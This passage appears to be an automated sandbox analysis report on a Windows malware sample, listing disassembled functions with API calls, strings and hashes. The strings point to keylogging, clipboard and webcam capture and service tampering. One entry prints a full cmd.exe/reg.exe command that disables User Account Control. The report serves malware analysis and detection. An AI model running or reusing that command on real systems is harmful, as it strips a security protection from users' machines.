                                                                                                                                                                                              • String ID: (CG$C:\Users\user\Desktop\4XYAW8PbZH.exe$BG
                                                                                                                                                                                              • API String ID: 0-799540987
                                                                                                                                                                                              • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                                                                                                                              • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                                                                                              • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                                                                                                                              • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                                                                                              Function 0043960C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __allrem.LIBCMT ref: 00439799
                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                                                                                                                                                                                              • __allrem.LIBCMT ref: 004397CC
                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                                                                                                                                                                                              • __allrem.LIBCMT ref: 00439801
                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1992179935-0
                                                                                                                                                                                              • Opcode ID: b8fade3388712e20a6f67c03e6901a2274372487572bf270bb9750812de2a36e
                                                                                                                                                                                              • Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
                                                                                                                                                                                              • Opcode Fuzzy Hash: b8fade3388712e20a6f67c03e6901a2274372487572bf270bb9750812de2a36e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
                                                                                                                                                                                              Function 00444B4D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __cftoe
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4189289331-0
                                                                                                                                                                                              • Opcode ID: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                                                                                                                                                              • Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                                                                                                                                                              • Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
                                                                                                                                                                                              Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                                                                                                • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prologSleep
                                                                                                                                                                                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                                                                                                              • API String ID: 3469354165-462540288
                                                                                                                                                                                              • Opcode ID: a9f7d0d3fadaaa2ab5302d74800214878727d50abf2ff1e7d6e11163ed2cafe4
                                                                                                                                                                                              • Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
                                                                                                                                                                                              • Opcode Fuzzy Hash: a9f7d0d3fadaaa2ab5302d74800214878727d50abf2ff1e7d6e11163ed2cafe4
                                                                                                                                                                                              • Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF
                                                                                                                                                                                              Function 00419DFC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                                                                                                                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 493672254-0
                                                                                                                                                                                              • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                                                                                                                                                              • Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                                                                                                                                                              • Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
                                                                                                                                                                                              Function 00437E16 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                              • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                                                                                                                              • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                                                                                                                                                                                              Function 00446ECF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                              • _free.LIBCMT ref: 00446F06
                                                                                                                                                                                              • _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                              • _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                              • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                              • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                                                                                                                                                                                              • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                              • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                                                                                                                                                                                              Function 00419C30 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                                                              • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                                                                                                                                                              • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                                                                                                                                                                                              • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                                                                                                                                                                                              Function 00419D32 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                                                              • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                                                                                                                                                              • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                                                                                                                                                                                              • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                                                                                                                                                                                              Function 00419D97 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                                                              • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                                                                                                                                                              • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                                                                                                                                                                                              • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                                                                                                                                                              • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                                                                                                                                                                                              Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Enum$InfoQueryValue
                                                                                                                                                                                              • String ID: [regsplt]$DG
                                                                                                                                                                                              • API String ID: 3554306468-1089238109
                                                                                                                                                                                              • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                                                                                                                                              • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                                                                                              Function 004559DA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                              • String ID: wKE
                                                                                                                                                                                              • API String ID: 269201875-3150218262
                                                                                                                                                                                              • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                                                                                                              • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                                                                                                              • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                                                                                                                                                                                              Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                                                                                                                                                                • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                                                                                                                                                                • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                                                                                                • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                                                                                                                                                                • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                                                                                              • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                                                                                                                                                                                              • API String ID: 2974294136-4018440003
                                                                                                                                                                                              • Opcode ID: 52feb45232d087000ab9dea4a82bd1c10224021308ca399c26d5e29f8a04d7c0
                                                                                                                                                                                              • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                                                                                                                                                                                              • Opcode Fuzzy Hash: 52feb45232d087000ab9dea4a82bd1c10224021308ca399c26d5e29f8a04d7c0
                                                                                                                                                                                              • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                                                                                                                                                                                              Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EventLocalTimewsprintf
                                                                                                                                                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                                              • API String ID: 1497725170-248792730
                                                                                                                                                                                              • Opcode ID: abe9d9f547bce7274006dd8b845fb0ff0597043dd99dd38add9522b7adedb076
                                                                                                                                                                                              • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                                                                                                                                                                                              • Opcode Fuzzy Hash: abe9d9f547bce7274006dd8b845fb0ff0597043dd99dd38add9522b7adedb076
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                                                                                                                                                                                              Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                              • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                              • String ID: `AG
                                                                                                                                                                                              • API String ID: 1958988193-3058481221
                                                                                                                                                                                              • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                                                                                                                                                              • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                                                                                              • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                                                                                              Function 0041CA2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                                                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                                              • String ID: 0$MsgWindowClass
                                                                                                                                                                                              • API String ID: 2877667751-2410386613
                                                                                                                                                                                              • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                                                                                              • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                                                                                                                                                                                              • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                                                                                                                                                                                              Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseHandle$CreateProcess
